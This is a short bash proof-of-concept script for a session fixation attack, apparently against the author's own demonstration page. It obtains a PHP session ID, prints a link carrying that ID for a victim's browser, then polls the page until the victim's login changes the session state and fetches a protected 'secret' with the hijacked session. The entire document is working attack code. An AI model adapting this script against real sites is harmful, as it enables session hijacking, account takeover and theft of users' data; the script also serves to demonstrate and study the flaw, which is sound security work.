#!/bin/bash

# HREF="http://ascii.ush.it/hack-sessionfixationpoc/safe.php";
HREF="http://ascii.ush.it/hack-sessionfixationpoc/vulnerable.php";

# SESS="deadbeefcacacacacacacacacacacacb"; // on some servers you can just issue an arbitrary session
SESS=`curl "$HREF" -Is | grep -i "Set-Cookie: " | cut -d "=" -f2 | cut -d ";" -f1`;

echo -en "\nSESSION FIXATION POC - Francesco 'ascii' Ongaro\n\n";
echo -en "Point your browser to: ";
echo -en "$HREF?PHPSESSID=$SESS\n";
echo -en "IT HAS TO BE A CLEAN BROWSER WITH NO COOKIES! Now press enter..\n";
read OKAY;

echo -en "Loading please wait..\n";
USR=0;
for i in `seq 1 1000000`; do
 BUF=`curl "$HREF?PHPSESSID=$SESS" -H 'Connection: close' -s | grep "^Hits\|^Level"`;
 BUF=`echo $BUF|cat`;
 echo "[ii] sess[$SESS]buf[$BUF]";
 OLDUSR=$USR;
 USR=`echo $BUF | sed 's/Hits:.*Level: //g'`;
 if [ "$USR" != "$OLDUSR" ]; then
  echo "[WW] [wow we changed state] $USR";
  ACTION_BUF=`curl "$HREF?PHPSESSID=$SESS&showmethesecret=yeees" -H 'Connection: close' -s | grep "^The secret is"`;
  if [ "$ACTION_BUF" != "" ]; then
   echo "[FF] WOW!";
   echo $ACTION_BUF;
   break;
  else
   echo "[EE] Unable to retrive the secret!";
  fi;
 fi;
 sleep 1;
done